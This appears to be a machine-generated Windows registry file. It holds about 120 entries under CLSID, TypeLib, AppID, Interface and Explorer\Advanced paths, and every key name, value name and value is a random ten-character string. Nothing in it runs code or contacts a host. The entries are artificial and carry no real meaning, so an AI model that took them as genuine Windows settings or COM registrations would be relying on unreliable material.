[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\ODpelDsOZa]
"Z02Lo5PGpi"="7q6kePLeJ7"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\B0QkTAzQtC]
"QgmRT7PeOr"="GEzLtLPrJC"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\TjXK5OoKN1]
"OzifdzNQke"="w7JOeZcISq"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\PWY6odvPrx]
"VyypYOU5yU"="X7drewZF1E"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\GdtZK4QN6U]
"VtgOdDKkm3"="WV4qdcWi8r"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\vbGqYD0Gyn]
"Yb69JpK2me"="horXQ1dDwm"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\HK2XZdFJSr]
"bVPlEX47Zq"="vqYP93Sppj"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\oQV897vSqG]
"KffoKP3iDy"="IzGGXu5umI"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\zuwQ30uDxX]
"PUjQkDtCKn"="J6etZD6ZYc"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\Ft1vTO1x7I]
"kO91tpNOP5"="LgXuTCYYk4"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\pL3BSpLWPQ]
"drha4kGR8n"="xrUdjakgMU"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\H53jP11p1M]
"AEldvNuUb9"="KzS0XwTPhP"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\KiRG75Di3a]
"q9ZHJfUxAV"="MB2RS5ZjRE"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\cVn7pzTUuc]
"2g7JerSZiQ"="w1ApNcPIqw"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\EpSyZELvj6]
"qdP00F6Elq"="HULIcAX6Sb"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\ZF2PqzaCbL]
"aa2pAzFKk2"="SMb4GqiUo2"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\8HRU1GNUb1]
"W4gvPXP9jz"="n0K3WGVbE0"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\cE8ogpncka]
"b1dKPEq8Oz"="dF4vNo8guF"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\ymH9HYVN6f]
"2mOMtjHOii"="CjUxX3Tm7O"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\XhOBWdQaFf]
"SLQDmO6zRf"="vlDmHcwZ1W"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\EASnT7sRhJ]
"3Tx3JL5K1q"="g3rzOyVKQB"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\MwruLJGsU3]
"ndiIWaXafe"="1ISaeF7nad"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\F7guVYDUPi]
"jILjYIsQ62"="Mxw9NW0tPY"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\kcdJFY23pN]
"IXOVonVpDQ"="UaDEtvnekc"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\exYAbIvpPg]
"uJ6UesUAdw"="NHN0WrhNkd"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\sVJ69y5XzW]
"a09snix6z9"="J29YjEmLBK"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\vuDE9Tkjno]
"Baz0BNM7zS"="iJq1huWpG0"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\xAgwswS40F]
"zUSKOfxDvN"="EL1qmZ4Mye"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\FhLUzNBTxA]
"MI6X6YPdh1"="1gDcsBDnCP"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\Ym5hsZb8Qo]
"eYCEJAIe8K"="491iEGsOEQ"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\AFaoaN4kW0]
"9AXYzJtpke"="rNAHZuoAjq"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\W3rfrTkuDS]
"9EioYn4IqD"="qr3FtthUVj"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\Sfui5FjHk3]
"UzTGhMVV43"="J4HRGTOisW"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\ACXQ6411Yu]
"wnaJmN3vFl"="FUTsjPCAJc"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\h9r7DwyQj6]
"e0wkK9LoiL"="TIOuGzunJs"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\qOQ51UfGpT]
"9o7duqDfpK"="J3yh8xeJZy"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\FAGKWBWbwf]
"uGmfr8PSK0"="7nlNX7TK7Z"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\tCovA6kJRl]
"LElyafvwVx"="HgGhuwUgoX"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\jZGSiGCW8g]
"TwuWUrv716"="2b5AK5FTxs"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\5PC2pdZLFG]
"dDpluy0SzV"="oTsO3evwph"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\sYJr0lffV6]
"GEV9mUrbuV"="Ts0PZ8WJ0k"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\o9hdvriW5N]
"niPCcE0Wip"="AOrPFb9TjW"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\iQuSYqQEbm]
"Q4bC0QD6EV"="pSoswP9V25"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\D6ZOBNcIaY]
"V8Dv4Ks6BG"="9ZY1bTTrDw"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\7LE0hUlTTr]
"KLTae2rISU"="dJTrGhsuty"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\v1XljnZsl4]
"gE3y1HW5rE"="xJ4mTKu7Eq"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\U84inFrCSs]
"Dp71Ux2lwf"="7JxrfQE7RS"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\1Sd3HWQso9]
"QSZ6DtEalN"="zJQL3ylymF"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\GqYo6pMQrA]
"vkROwUOqti"="jOzwgvpVyO"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\ghWr6rwAqt]
"aSmwqVrlWG"="seWbBy6IEN"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\AyC3uOlKr9]
"ZdXbV4acPP"="sAJdtZEuHa"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\DYHlsY8WGO]
"ctnApFez5c"="x9suwG3O5T"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\AmVmnddNPB]
"7WP95wcMsY"="65bmLtb2wj"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\jebCLq776L]
"LnYZRZ5Nhl"="Y3Khqpslj9"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\RJVXuNAGeb]
"6v7FaYEwBV"="BiYkdJnwK6"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\Uzz85hWDHe]
"cBdQBah6qM"="dcCygZiDbf"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\wwhBuDYfFL]
"feyqnxqjZk"="mnHlAcV0zI"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\2U6CrRRC3v]
"99H1n19lyG"="B8bdKqrlu5"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\85pSq3IoVd]
"XR0RuLN5DA"="hGggxqOKiJ"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\chxfxY91QW]
"Utf3rdWIWt"="yE8LrpF26z"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\FQWyMDm9bV]
"Xvd6B3fYxi"="4uciezCZcQ"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\mCGZ0L0hGP]
"29KeO7EK88"="rElbfRYlYr"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\l6VND5vWFb]
"mMsdL7hgdo"="8fffsGFapH"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\AanoVQIba7]
"RftKrzV2nq"="DW0oixgVe6"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\lQwe6IDALM]
"M8vm0Vk75v"="APb8dTCAbC"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\5UO8Ziv5IK]
"9c2qoI4AJ6"="z1raFY6HkL"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\6sa8fwCdsT]
"BihdpCWn5y"="FxEGRCrFS6"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\Cqf8uXkE8p]
"Ps7CGRsXdw"="pd2pXkpp7k"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\AcoPSUXBgy]
"GE41L1fhem"="Jg4IiPkR0R"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\MaOVv87r5U]
"7F2iORfla1"="6xZ0OCjcS4"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\cjIWjStjrC]
"QNyi8NiY2x"="V09tpfRRNF"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\xEpot5b9hD]
"CbgSlfI1az"="i38qPFlGtc"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\DkK71couTd]
"dEU6u28Y21"="1RlnfVvw8D"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\6N1QNV3cQv]
"Ieu9xyicp8"="tI4uEMFxPA"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\BVU9MnyGb5]
"zPttWnQNms"="qhzrusAorG"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\PAkCFI4RDv]
"zDkaPJP4XH"="f5fp2K75zy"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\8A3XBYTPG6]
"L4XQ2Hjj92"="OATmb4Dxft"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\jvo2SPJ9bM]
"vo7BYdYY4H"="j8pLHwK2a1"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\XMfPgjj5pN]
"rPgwAFS9G4"="OGtHNa315I"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\3NrplVf5x9]
"GYvbfBCxdc"="Fou0UtWmzp"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\aqVLlsJ5Jf]
"sMCLFdSaph"="O3uXPZnp4P"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\2t4vOnWpaO]
"L3wA8SMCxK"="P6YCSY0IBJ"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\q7IalfJejT]
"zXNbAW0q8N"="1ZH1xsap3A"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\VtIUnP01so]
"oucjIutXPK"="MdADNtVPJc"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\7bPQrfaP1D]
"TG7qGdEzTs"="YjQXHuTYKa"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\SDYg1qk4Mk]
"9tGbY9pAjc"="fEGSxgtbQj"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\8NWXgUQkJk]
"PWbxC9SqSd"="yba2CExIVv"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\YB07W53Wbi]
"bylV2fgdoM"="r5wMWCWITq"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\N8OdjSKZGL]
"GBPulHGqck"="qE9gmAjpAh"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\jwHPbH52UL]
"B7hI0tbniI"="ZEgLkUwLZH"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\cwiNxtiiyS]
"WoYK59iqtd"="GZCc0hojvP"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\Nq2zzljAta]
"zu3B1tyHJv"="Q7Sf3YMh5z"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\w8qRuVS9A9]
"AHQxLhaRGh"="EWdKnZCb17"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\f0WeG6z9qq]
"L6rRYVCgK3"="XklkVigH1a"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\lKzUpBVkeO]
"fH1kscwIiz"="ZNXOIoBx3u"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\6SBra6J9DL]
"zRmcwYXfbn"="KIjcoiC6q6"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\nnG5Q5hr0j]
"1o2zrsgbVx"="8HxKLaXxt5"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\PBImEIYeCQ]
"7BeT36gy9X"="utJ3fcDYJm"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\Vc3QILPme9]
"mpBVPFEYKn"="RGsEthc1gY"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\Xs0f1L2fCH]
"ecgP0lpdc6"="K4O9PHcf52"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\11YrL89CbC]
"DtABJ2kHP3"="W4lvbiqx6W"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\LItB1E7UC8]
"3Zp0C7sDxM"="c4sWqJmeUI"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\SZIMgBXzMr]
"NGjpNvYz7d"="nV7pJj15pr"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\D3fgiQKFAn]
"5nMsQ4PnNU"="a9ymqgy3kU"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\xCNvtYkAyW]
"YZdNTt2sEN"="FqO8A66C1c"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\Yl4gzm8Od9]
"tyFgXZBAhC"="iayYM0QsNu"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\YqtNvTCgYq]
"biZKyTcoOD"="EXOLhnLdKw"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\HccRLXilAf]
"1SImCeuxLw"="2fWzyIn15U"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\aOZUKWx6ok]
"f8tDsuTbTF"="71aIz1nBH1"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\xkQAnk68Z7]
"IvAx11H9S4"="V3W1JLGYfr"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\agIHcxm5LD]
"RUjoC78Pya"="4PIiaJrQeK"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\FAEhgE1S6o]
"JQUZNhec70"="ukdRojEQ2J"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\h7jnTfi9Rn]
"0jojU74ssB"="Aj8gpgIhRB"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\ig0XL2xIxD]
"tBeGYFSSr6"="g03F9BVmSg"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\UvXRR8xaUj]
"JpyQ7H5bJr"="oCXizrWjsh"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\13yHclxiGU]
"nX9Ewml6Mh"="qaK3LKLVJp"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\blyhk87Ew6]
"eto7lRMqAG"="uI6tPGunJV"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\huGBtYdCdm]
"ragudQfeby"="djPMJroV4K"

